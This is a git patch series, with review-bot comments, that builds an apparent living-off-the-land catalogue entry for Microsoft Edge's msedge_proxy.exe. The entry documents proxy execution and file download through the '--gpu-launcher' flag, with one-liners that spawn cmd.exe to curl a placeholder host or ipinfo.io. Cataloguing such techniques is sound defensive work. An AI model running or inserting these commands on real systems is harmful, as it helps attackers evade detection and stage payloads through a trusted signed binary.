From b14ad21ff91e19b8dd63dd7ec157ee068e729d1c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Fri, 18 Aug 2023 17:17:49 +0300 Subject: [PATCH 01/17] Create msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 yml/OSBinaries/msedge_proxy.yml diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml new file mode 100644 index 0000000..dfe5567 --- /dev/null +++ b/yml/OSBinaries/msedge_proxy.yml @@ -0,0 +1,29 @@ +Name: msedge_proxy.exe +Description: Microsoft Edge Browser +Author: Mert Daş +Created: 2023-08-18 +Commands: + - Command: msedge_proxy.exe http://example.com/test.zip + Description: msedge_proxy will download malicious file. + Usecase: Download file from the internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&" + Description: Edge will silently download the file. + Usecase: Download file from the internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" + Description: msedge_proxy.exe will execute file in the background + Usecase: Executes a process under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10, Windows 11 +Acknowledgement: + - Person: Mert Daş + Handle: '@merterpreter' From 68629128a3fc54db5f151909c62740d7a8930ebf Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Fri, 18 Aug 2023 17:44:23 +0300 Subject: [PATCH 02/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index dfe5567..50121bf 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,3 +1,4 @@ +--- Name: msedge_proxy.exe Description: Microsoft Edge Browser Author: Mert Daş From f4acc019063d85705efebeefb4eebe33d7d1f3c6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Fri, 18 Aug 2023 17:47:17 +0300 Subject: [PATCH 03/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 50121bf..3658060 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,7 +1,7 @@ --- Name: msedge_proxy.exe Description: Microsoft Edge Browser -Author: Mert Daş +Author: 'Mert Daş' Created: 2023-08-18 Commands: - Command: msedge_proxy.exe http://example.com/test.zip From 0f3b483ae16bc0dee8f662118aedc5ac50116a6d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Fri, 25 Aug 2023 21:23:41 +0300 Subject: [PATCH 04/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 3658060..1bbf15c 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,6 +1,6 @@ --- Name: msedge_proxy.exe -Description: Microsoft Edge Browser +Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: 
@@ -12,7 +12,7 @@ Commands: MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&" - Description: Edge will silently download the file. + Description: Edge will silently download the file. Usecase: Download file from the internet Category: Download Privileges: User From 9d79fab2305c75820a3235d3286a1896cc75c880 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Fri, 25 Aug 2023 21:24:58 +0300 Subject: [PATCH 05/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 1bbf15c..f237f9b 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,6 +1,6 @@ --- Name: msedge_proxy.exe -Description: Microsoft Edge Browser +Description: Microsoft edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: From 53f8fbe19b27e90509e6f3fb01b17c35b95e9c25 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 21:44:41 +0300 Subject: [PATCH 06/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index f237f9b..ff073e1 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml 
@@ -11,14 +11,14 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&" + - Command: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&" Description: Edge will silently download the file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" + - Command: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" Description: msedge_proxy.exe will execute file in the background Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute From a0874f2bb73bcfe27b2cd657e413e40c9d785a01 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 21:48:05 +0300 Subject: [PATCH 07/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index ff073e1..95a0e80 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml 
@@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&" + - Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\Windows\System32\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&" Description: Edge will silently download the file. Usecase: Download file from the internet Category: Download From 247511bca85446726c0dce774e3c2aee31586d1c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 21:51:32 +0300 Subject: [PATCH 08/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 95a0e80..c347c19 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -18,7 +18,7 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" + - Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" Description: msedge_proxy.exe will execute file in the background Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute From 994aa792f0beebf81bee641ec197fad774538c7f Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 22:11:01 +0300 Subject: [PATCH 09/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index c347c19..10af862 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -4,7 +4,7 @@ Description: Microsoft edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: - - Command: msedge_proxy.exe http://example.com/test.zip + - Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" http://example.com/test.zip Description: msedge_proxy will download malicious file. Usecase: Download file from the internet Category: Download From f8743a4109644bf4801a299b0547bf3dee2b7285 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 22:17:14 +0300 Subject: [PATCH 10/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 10af862..453d30f 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml 
@@ -4,21 +4,21 @@ Description: Microsoft edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: - - Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" http://example.com/test.zip + - Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" http://example.com/test.zip Description: msedge_proxy will download malicious file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\Windows\System32\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&" + - Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\\Windows\\System32\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&" Description: Edge will silently download the file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" + - Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\system32\\cmd.exe /c ping google.com &&" Description: msedge_proxy.exe will execute file in the background Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute From d5f153b84bc445c94e16db0af5864ede1afcae93 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 22:23:40 +0300 Subject: [PATCH 11/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) 
diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 453d30f..0a67972 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml 
@@ -1,26 +1,26 @@ --- Name: msedge_proxy.exe -Description: Microsoft edge Browser +Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: - - Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" http://example.com/test.zip + - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe http://example.com/test.zip" Description: msedge_proxy will download malicious file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\\Windows\\System32\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&" + - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\\\\Desktop\\\\test.json &&\"" Description: Edge will silently download the file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\system32\\cmd.exe /c ping google.com &&" + - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c ping google.com &&\"" Description: msedge_proxy.exe will execute file in the background - Usecase: Executes a process under a trusted Microsoft signed binary + Usecase: Executes a process under a trusted Microsoft-signed binary Category: Execute Privileges: User MitreID: T1218 From e2c58fcf31e0b24309baaa89d47bb406c4a72665 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 22:28:00 +0300 Subject: [PATCH 12/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 0a67972..ac498ff 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -20,7 +20,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c ping google.com &&\"" Description: msedge_proxy.exe will execute file in the background - Usecase: Executes a process under a trusted Microsoft-signed binary + Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1218 From 7da6f3216dc5438035c8eb6b604d038c1ab3d010 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Tue, 5 Sep 2023 18:37:14 +0300 Subject: [PATCH 13/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index ac498ff..cab7496 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,5 +1,5 @@ ---- Name: msedge_proxy.exe +Full_Path: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 From fee20a08130f420d8dd17514b8efc2bedc94b73b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Tue, 5 Sep 2023 18:39:16 +0300 Subject: [PATCH 14/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 1 + 1 file changed, 1 insertion(+) 
diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index cab7496..ea7bd62 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,3 +1,4 @@ +--- Name: msedge_proxy.exe Full_Path: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" Description: Microsoft Edge Browser From 69976b4880d1b7fe9dc00c19c15578d49e168b75 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Tue, 5 Sep 2023 18:41:36 +0300 Subject: [PATCH 15/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index ea7bd62..fb75715 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,7 +1,7 @@ --- Name: msedge_proxy.exe -Full_Path: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" -Description: Microsoft Edge Browser +Full_Path: + - Path: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe Author: 'Mert Daş' Created: 2023-08-18 Commands: From e585183dcd7a6b9e90c87539105f71cc6d854fb3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Tue, 5 Sep 2023 18:45:00 +0300 Subject: [PATCH 16/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index fb75715..9aeb5a0 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -2,6 +2,7 @@ Name: msedge_proxy.exe Full_Path: - Path: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe +Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: From e75e99f1cfe148aa8bcf82a5a52dd3d38a80f914 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Tue, 5 Sep 2023 18:47:05 +0300 Subject: [PATCH 17/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 9aeb5a0..3c0c04e 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -2,7 +2,7 @@ Name: msedge_proxy.exe Full_Path: - Path: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe -Description: Microsoft Edge Browser +Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands:
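Review bot: PATCH 01 adds the entry without Full_Path, Detection or Resources sections, and two of the three Description lines misstate what actually happens. In `Description: Edge will silently download the file.` the download is performed by the cmd.exe/curl process named in `--gpu-launcher=`, with msedge_proxy.exe only as its parent, and `Description: msedge_proxy.exe will execute file in the background` runs the command given in `--gpu-launcher=`, not a file. Reword both to name the parent/child relationship a defender will see (msedge_proxy.exe spawning cmd.exe with `--disable-gpu-sandbox --gpu-launcher=` on the parent's command line) and add a Detection block keyed on that relationship; for the first command, `msedge_proxy will download malicious file.` should say that the URL is opened in Edge and the file arrives through the browser's normal download path.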
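Review bot: PATCH 04 (both hunks) and PATCH 17 change only trailing whitespace on `Description:` lines, and several later patches undo earlier ones: PATCH 05 lowercases `Microsoft edge Browser` and PATCH 11 restores it, PATCH 11 introduces `Microsoft-signed` and PATCH 12 reverts it, PATCH 13 drops the `---` document marker and PATCH 14 re-adds it, PATCH 15 deletes `Description:` and PATCH 16 re-adds it. Squash the series into one commit so the history records the final entry rather than the editing churn.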
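Review bot: The Command values introduced in PATCH 07, 08 and 09 are not valid YAML: a scalar that begins with `"` is a double-quoted scalar that ends at the next unescaped `"`, so the `--disable-gpu-sandbox ...` text after `"...\msedge_proxy.exe"` is trailing content the parser rejects, and `\P` inside double quotes is not a recognised escape. PATCH 10 fixes the escapes but keeps the trailing text; PATCH 11 is the first form that parses. PATCH 07 also swaps the placeholder `http://example.com:8001/test.txt` for the live service `curl ipinfo.io/json`, so anyone reproducing the entry in a lab sends a real request to a third party; keep the example.com placeholder used by the other command.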
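Review bot: In PATCH 11 the `\\\\` sequences inside the double-quoted scalars decode to two backslashes each, so the rendered value is `--gpu-launcher="C:\\Windows\\System32\\cmd.exe ..."` rather than the single-backslash path tested in PATCH 01; write `\\` for one backslash (the `\"` for the inner quotes is correct). Run the file through a YAML loader and compare the decoded Command strings against what was actually executed before merging.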
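Review bot: PATCH 15 turns Full_Path into a list but writes `- Path: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe` as a plain (unquoted) scalar, where backslashes are literal, so the stored path now contains doubled backslashes and no longer matches the single-backslash path that PATCH 13's quoted form decoded to. Either quote the value and keep `\\`, or leave it unquoted with single backslashes; the same hunk also removes `Description: Microsoft Edge Browser`, which PATCH 16 has to put back.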